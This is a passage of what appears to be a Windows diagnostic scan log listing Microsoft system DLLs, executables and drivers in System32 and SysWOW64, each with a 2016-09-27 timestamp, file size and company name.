2016-09-27 13:02 - 2016-09-27 13:02 - 01362504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01349120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01343928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01312768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorDataService.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 01293312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 01282048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01176664 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01081856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01066328 _____ (Microsoft Corporation) C:\WINDOWS\system32\pidgenx.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00959104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00939872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pidgenx.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Streaming.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00857440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WebcamUi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00811416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00790760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00782176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00781824 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00758784 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00755656 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00665768 _____ (Microsoft Corporation) C:\WINDOWS\system32\GenValObj.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00650240 _____ (Microsoft) C:\WINDOWS\system32\DbgModel.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00640976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00605184 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00595488 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00592384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GamePanel.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00540160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00529928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00523712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMRServer.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00521728 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00520192 _____ (Microsoft Corporation) C:\WINDOWS\system32\w32time.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00509952 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Bluetooth.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00495104 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00484352 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanconn.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00450392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00447488 _____ (Microsoft Corporation) C:\WINDOWS\system32\das.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00444416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00438784 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDec.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00423776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifitask.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00409944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2016-09-27 13:02 - 2016-09-27 13:02 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00408600 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsmf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00396800 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00396168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00382272 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00379744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00321792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Phoneutil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00313560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00303968 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\dlnashext.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00289280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NmaDirect.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00282624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_WorkAccess.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00263680 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00260096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Phoneutil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00259584 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00248320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00244816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapp3hst.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafpos.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapphost.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcpipcfg.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_G18030.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00204288 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\DscCoreConfProv.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00198144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FSClient.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappcfg.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tcpipcfg.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00172528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00162850 _____ C:\WINDOWS\system32\C_932.NLS
2016-09-27 13:02 - 2016-09-27 13:02 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\system32\XamlTileRender.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00151224 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00141824 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\SysWOW64\DscCoreConfProv.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00137728 _____ (Microsoft Corporation) C:\WINDOWS\system32\wificonnapi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\system32\slc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MediaFoundation.DefaultPerceptionProvider.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00133472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00121368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00121344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00117240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\IdCtrls.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00108384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00097792 _____ (Microsoft Corporation) C:\WINDOWS\system32\NFCProvisioningPlugin.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\dasHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappgnui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00089600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\provdatastore.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\BarcodeProvisioningPlugin.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncPolicy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncPolicy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AddressParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\provtool.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00062816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemovableMediaProvisioningPlugin.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesetup.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ConfigureExpandedStorage.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.Search.UriHandler.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00057400 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappprxy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AddressParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactActivation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactActivation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceassociation.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Shell.Search.UriHandler.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00044472 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfpmp.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00041824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SysResetErr.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00036168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfpmp.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\netiougc.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iernonce.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Provisioning.ProxyStub.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\encapi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00026408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerSvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiougc.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slcext.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_IS2022.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanhlp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanhlp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\c_GSM7.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\spwmp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\spwmp.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccessRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccessRes.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdxm.ocx
2016-09-27 13:02 - 2016-09-27 13:02 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxmasf.dll
